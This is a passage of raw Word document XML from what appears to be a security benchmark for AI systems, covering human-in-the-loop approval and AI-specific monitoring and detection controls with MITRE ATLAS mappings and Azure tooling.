      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Define a capability manifest for each agent function or plugin, explicitly listing authorized actions (e.g., read-only data access, specific API calls) and prohibiting all others by default. Use a sandboxed execution environment to isolate function or plugin </w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>runtime, preventing unauthorized system calls or interactions with external resources. Implement runtime policy enforcement to block any attempts by the function or plugin to exceed its defined capabilities, using tools like API gateways or middleware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651814C7" w14:textId="49ED5005" w:rsidR="00D601CA" w:rsidRPr="00E53977" w:rsidRDefault="00D601CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Access permission control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6542BBCE" w14:textId="7A978CC8" w:rsidR="00D601CA" w:rsidRPr="00E53977" w:rsidRDefault="00D601CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Monitoring and auditing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D75E71" w14:textId="1252A583" w:rsidR="00D601CA" w:rsidRPr="00E53977" w:rsidRDefault="00D601CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>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plugin activities in a centralized log repository, enabling traceability and compliance reviews.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEC191E" w14:textId="39CF2DEB" w:rsidR="00D601CA" w:rsidRPr="00E53977" w:rsidRDefault="00D601CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Governance and validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EC22B3" w14:textId="40D9FDB8" w:rsidR="00D601CA" w:rsidRPr="00E53977" w:rsidRDefault="00D601CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>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124" w:name="_Toc242449587"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>AI-5: Ensure human-in-the-loop</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
    </w:p>
    <w:p w14:paraId="69E0778D" w14:textId="7D1DA7D8" w:rsidR="00D601CA" w:rsidRPr="00E53977" w:rsidRDefault="00D601CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3104B6" w14:textId="32130283" w:rsidR="00D601CA" w:rsidRPr="00E53977" w:rsidRDefault="00D601CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Implement human review and approval for critical actions or decisions taken by the AI application, especially when interacting with external systems or sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD2D1C5" w14:textId="783341D1" w:rsidR="00D601CA" w:rsidRPr="00E53977" w:rsidRDefault="00D601CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="42147372" w14:textId="5CCCF523" w:rsidR="00D601CA" w:rsidRPr="00E53977" w:rsidRDefault="00D601CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Erroneous or misleading outputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEE1761" w14:textId="0FDAF40F" w:rsidR="00D601CA" w:rsidRPr="00E53977" w:rsidRDefault="00D601CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="252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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unauthorized system interactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4792894C" w14:textId="007AC933" w:rsidR="00AC323D" w:rsidRPr="00E53977" w:rsidRDefault="00AC323D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="252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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Adversarial exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8FD553" w14:textId="6B44D271" w:rsidR="002F4E52" w:rsidRPr="00E53977" w:rsidRDefault="00AC323D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Techniques like prompt injection or model manipulation coerce AI into generating harmful </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>outputs</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>; human review serves as a critical checkpoint to detect and block such attacks before execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C26D64F" w14:textId="4D8BCCB6" w:rsidR="00AC323D" w:rsidRPr="00E53977" w:rsidRDefault="00AC323D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATLAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C86D79A" w14:textId="18A5E091" w:rsidR="00AC323D" w:rsidRDefault="00AC323D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>LLM Data Leakage (AML.T0057)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235CC3DF" w14:textId="2A57808B" w:rsidR="00666C39" w:rsidRPr="00E53977" w:rsidRDefault="00666C39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="453"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00666C39">
        <w:t>Extracting sensitive data via AI interactions; human approval prevents unauthorized data outflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D363955" w14:textId="7E2D5F7D" w:rsidR="00AC323D" w:rsidRDefault="00AC323D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>External Harms (AML.T0048)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698A91B3" w14:textId="164AB9DF" w:rsidR="00666C39" w:rsidRPr="00E53977" w:rsidRDefault="00666C39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="453"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00666C39">
        <w:t>Disrupting AI operations or manipulating outputs; human-in-the-loop mitigates harmful outcomes by validating decisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2004D3BA" w14:textId="04DDA64C" w:rsidR="00AC323D" w:rsidRPr="006270B3" w:rsidRDefault="00AC323D" w:rsidP="007D3D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006270B3">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>AI-5.1: Ensure human-in-the-loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123B310A" w14:textId="597FB6BB" w:rsidR="00AC323D" w:rsidRPr="00E53977" w:rsidRDefault="00AC323D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implementing human-in-the-loop (HITL) controls establishes critical checkpoints for AI systems performing high-risk actions or processing sensitive data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33379FF8" w14:textId="3282A23E" w:rsidR="00AC323D" w:rsidRPr="00E53977" w:rsidRDefault="00AC323D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Define critical actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09195076" w14:textId="0613D541" w:rsidR="00AC323D" w:rsidRPr="00E53977" w:rsidRDefault="00AC323D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Identify high-risk AI operations requiring human review such as external data transfers, processing of confidential information, or decisions impacting financial or operational outcomes, using risk assessments to prioritize review pathways.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D9CB21" w14:textId="1CA210CD" w:rsidR="00AC323D" w:rsidRPr="00E53977" w:rsidRDefault="00AC323D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Establish approval mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0F921D" w14:textId="4C52A6FB" w:rsidR="00AC323D" w:rsidRPr="00E53977" w:rsidRDefault="00AC323D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00F4302D">
        <w:lastRenderedPageBreak/>
        <w:t>Design workflows using Azure Logic Apps or Power Automate that pause AI processes at critical junctures, routing outputs to human reviewers via secure dashboards with all actions logged in Azure Monitor for traceability</w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AA308F" w14:textId="013D4F69" w:rsidR="00AC323D" w:rsidRPr="00E53977" w:rsidRDefault="00AC323D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Train reviewers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AE535A" w14:textId="219A66C6" w:rsidR="00AC323D" w:rsidRPr="00E53977" w:rsidRDefault="00AC323D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Optimize review processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D529D1" w14:textId="3785896E" w:rsidR="001807CC" w:rsidRPr="00E53977" w:rsidRDefault="001807CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Incorporate feedback loops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FA741F" w14:textId="49F3C93E" w:rsidR="001807CC" w:rsidRPr="00E53977" w:rsidRDefault="001807CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Secure HITL interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC55099" w14:textId="4592E246" w:rsidR="00877B90" w:rsidRPr="00E53977" w:rsidRDefault="001807CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Protect review systems with encryption, implement strict access controls using Microsoft Entra ID, and deploy anomaly detection to prevent tampering or unauthorized access to approval processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FE9726" w14:textId="245AB9D1" w:rsidR="001807CC" w:rsidRPr="00E53977" w:rsidRDefault="001807CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Conduct regular testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1390A616" w14:textId="022D9DCB" w:rsidR="001807CC" w:rsidRPr="00E53977" w:rsidRDefault="001807CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="252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125" w:name="_Toc242449588"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Monitor and Respond</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:p w14:paraId="654B9455" w14:textId="63E8BDDA" w:rsidR="001807CC" w:rsidRPr="00E53977" w:rsidRDefault="001807CC" w:rsidP="001807CC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="_Toc242449589"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>AI-6: Establish monitoring and detection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p w14:paraId="086C34F9" w14:textId="4B857B2B" w:rsidR="001807CC" w:rsidRPr="00E53977" w:rsidRDefault="001807CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C87F15" w14:textId="4A38C7DF" w:rsidR="001807CC" w:rsidRPr="00E53977" w:rsidRDefault="001807CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="252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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2CE0FBF8" w14:textId="46A7E320" w:rsidR="001807CC" w:rsidRPr="00E53977" w:rsidRDefault="001807CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Jailbreaking and prompt injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D18CA0" w14:textId="762585C1" w:rsidR="001807CC" w:rsidRPr="00E53977" w:rsidRDefault="001807CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Attackers attempt to bypass AI safeguards through jailbreaking or manipulate outputs via prompt injection, leading to harmful or unauthorized actions that compromise system integrity and user safety without detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629ACE69" w14:textId="4D303AF0" w:rsidR="001807CC" w:rsidRPr="00E53977" w:rsidRDefault="001807CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Data exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FDE015" w14:textId="44EBB55C" w:rsidR="001807CC" w:rsidRPr="00E53977" w:rsidRDefault="001807CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unauthorized access or transfer of sensitive data processed by AI applications results in breaches exposing confidential information, with traditional monitoring missing AI-specific exfiltration patterns through model inference or API abuse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CA5EC3" w14:textId="63BA90D2" w:rsidR="005A1258" w:rsidRPr="00E53977" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Anomalous behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311F08B9" w14:textId="676E8991" w:rsidR="005A1258" w:rsidRPr="00E53977" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="288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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATLAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F03A830" w14:textId="6814DB01" w:rsidR="005A1258" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>AI Model Inference API Access (AML.T0040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA61F72" w14:textId="18B66CE1" w:rsidR="00666C39" w:rsidRPr="00E53977" w:rsidRDefault="00666C39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00666C39">
        <w:t>Identifying compromised credentials or unauthorized API calls used to access AI systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A77E79" w14:textId="701E7DC1" w:rsidR="005A1258" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>LLM Data Leakage (AML.T0057)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CFB5C6" w14:textId="701D4E46" w:rsidR="00666C39" w:rsidRPr="00E53977" w:rsidRDefault="00666C39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00666C39">
        <w:t>Identifying unauthorized data transfers from AI systems to external endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18608B9F" w14:textId="6A1B6879" w:rsidR="005A1258" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>External Harms (AML.T0048)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9430CF" w14:textId="7D0F2060" w:rsidR="00666C39" w:rsidRPr="00E53977" w:rsidRDefault="00666C39">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00666C39">
        <w:t>Detecting harmful outcomes such as manipulated model outputs or system disruptions caused by attacks.</w:t>
      </w:r>
    </w:p>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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Establishing comprehensive monitoring and detection for AI systems requires specialized capabilities beyond traditional security monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7143004D" w14:textId="37DE5908" w:rsidR="005A1258" w:rsidRPr="00E53977" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement AI-specific threat detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0C2777" w14:textId="09ABA7E8" w:rsidR="005A1258" w:rsidRPr="00E53977" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Deploy Microsoft Defender for Cloud's threat protection for AI services to monitor AI system activities including model inference, API calls, and plugin interactions, configuring detection for suspicious activities such as jailbreak attempts or prompt injection patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758834AC" w14:textId="133CDD3F" w:rsidR="005A1258" w:rsidRPr="00E53977" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enable real-time behavioral monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B617893" w14:textId="6E04C7D0" w:rsidR="005A1258" w:rsidRPr="00E53977" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Deploy data security monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6250BAB0" w14:textId="63377CA0" w:rsidR="005A1258" w:rsidRPr="00E53977" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Integrate threat intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0138E826" w14:textId="1C21C7C8" w:rsidR="005A1258" w:rsidRPr="00E53977" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement anomaly detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38718459" w14:textId="068AB65F" w:rsidR="005A1258" w:rsidRPr="00E53977" w:rsidRDefault="005A1258">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2520"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:ind w:left="2160"/>
      </w:pPr>
